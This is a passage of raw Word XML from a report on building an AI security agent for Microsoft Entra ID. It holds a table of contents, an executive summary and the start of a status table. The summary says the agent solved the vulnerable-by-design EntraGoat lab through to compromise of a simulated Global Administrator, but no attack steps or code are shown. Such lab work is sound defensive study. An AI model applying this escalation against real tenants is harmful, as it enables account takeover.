                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EA70DEF" w14:textId="1AFC5E11" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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33" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.3 The Why — Underlying Security Flaw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301433 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49CE6DDA" w14:textId="5AB479E0" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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34" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.4 The Fix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301434 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F5930D8" w14:textId="1E1AAA48"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35" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7. Agent Performance Review</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301435 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BB3907A" w14:textId="17599F47"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36" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8. Reflections</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301436 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62BA997F" w14:textId="0AD501B6"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37" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9. Future Work — Scenarios 2–5 (Planned)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301437 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B9F7CAC" w14:textId="6B5D2296"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38" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10. GitHub Repositories Used</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301438 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="207E9CAA" w14:textId="2255DC8E" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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39" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.1 Azure/azure-ai-agents-labs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301439 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="344CF8DB" w14:textId="01DD7BB1" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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40" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.2 Semperis/EntraGoat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301440 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07F3ADE6" w14:textId="09363BC0"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41" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix A — Tool Index</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301441 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A62F6D8" w14:textId="697C7F0B"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42" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix B — Source Repository</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301442 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31A48F57" w14:textId="18B5F05E"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43" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix C — Files Created During This Project</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301443 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="111BD267" w14:textId="35CDCBA9"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44" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix D — hello.py (full source)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301444 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73636C11" w14:textId="4526CAB1"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45" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix E — agent.py (full source)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301445 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4835C049" w14:textId="773099FC"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46" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix F — graph_client.py (full source)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301446 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="511E90F4" w14:textId="232809CF" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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301447" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix G — entra_agent.py (full source)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301447 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56637B89" w14:textId="1CABB1B7" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00DC1FF9">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="418709CA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F6E1C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc243301419"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3D801F4F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This report documents the design, build and testing of a Python-based AI security agent for Microsoft Entra ID, and its application against the EntraGoat vulnerable-by-design environment. The agent integrates Azure OpenAI (gpt-5-mini) with Microsoft Graph via tool-calling, allowing a language model to query live Entra ID configuration and reason about security risk in natural language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DEC58" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Five tenant-wide audit checks were implemented and validated against a production-style Entra ID tenant. EntraGoat Scenario 1, “Misowned and Dangerous,” was then solved end to end — first through manual enumeration, then reproduced and explained by the custom agent — resulting in full compromise of a simulated Global Administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA0D339" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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2600"/>
        <w:gridCol w:w="5200"/>
        <w:gridCol w:w="1700"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="329B4D27"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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DD3F0DF" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06CC7993" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Deliverable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D60B8B8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="2C18DB44" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AEB90A3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0 – AI Playground</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A186AED" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Azure OpenAI deployment, hello.py, agent.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6B7280"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65CAB1EE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="167D0DA4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50A09772" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1 – Connect to Entra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
